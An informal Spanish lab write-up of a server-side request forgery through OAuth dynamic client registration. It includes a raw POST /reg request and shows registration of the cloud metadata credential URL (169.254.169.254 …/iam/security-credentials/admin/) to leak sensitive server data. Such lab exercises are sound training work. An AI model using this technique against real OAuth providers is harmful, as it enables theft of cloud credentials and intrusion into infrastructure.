LAB
al iniciar sesion podemos ver que el proceso de login vemos que tenemos un oath.
Al realizar el proceso de login con el usuario wiener veremos que este iniciar la sesion mediante la red social.
El ver las solicitudes que se realizaron por detras al iniciar sesión vemos que se asigno un Id de sesion y luego este se asigno al icono.
/client/ilw3rnr9s5hd7b5i1t4xl/logoRevisando un podo la documentación de OAUTH vemos que tenemos ciertos recursos en donde existe configurtaciones.
/.well-known/oauth-authorization-server
/.well-known/openid-configurationhttps://oauth-0ade005a03a46c55826c814d02fb00c3.oauth-server.net/.well-known/openid-configurationAl ingresar al recurso /.well-known/openid-configuration vemos que en este se tiene ciertas rutas en donde podemos registrar un nuevo endpoint.
Al realizar una solicitud a /reg y revisando la documentación vemos que tenemos ciertos parámetros para registrar un nuevo endpoint
POST /reg HTTP/2
Host: oauth-0ade005a03a46c55826c814d02fb00c3.oauth-server.net
Cookie: _session=BqnYgLnLgGoCFHCgiDEEX; _session.legacy=BqnYgLnLgGoCFHCgiDEEX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Content-Type: application/json
Content-Length: 101
{
"application_type": "web",
"redirect_uris": [
"https://test.com"
]
}Vemos que al registrarlo, este nos asigna un ID. Este Id vemos que es algo similar al que hacia una solicitud de la imagen.
Al consultar sobre el recurso con el ID vemos que no se tiene ningún contenido.
Ahora, según el enunciado podemos registrar a http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/ obtenemos otra ID
Y al volver a realizar la solicitud vemos que este apunta a un archivo, el cual existe y vemos información sensible del servidor.
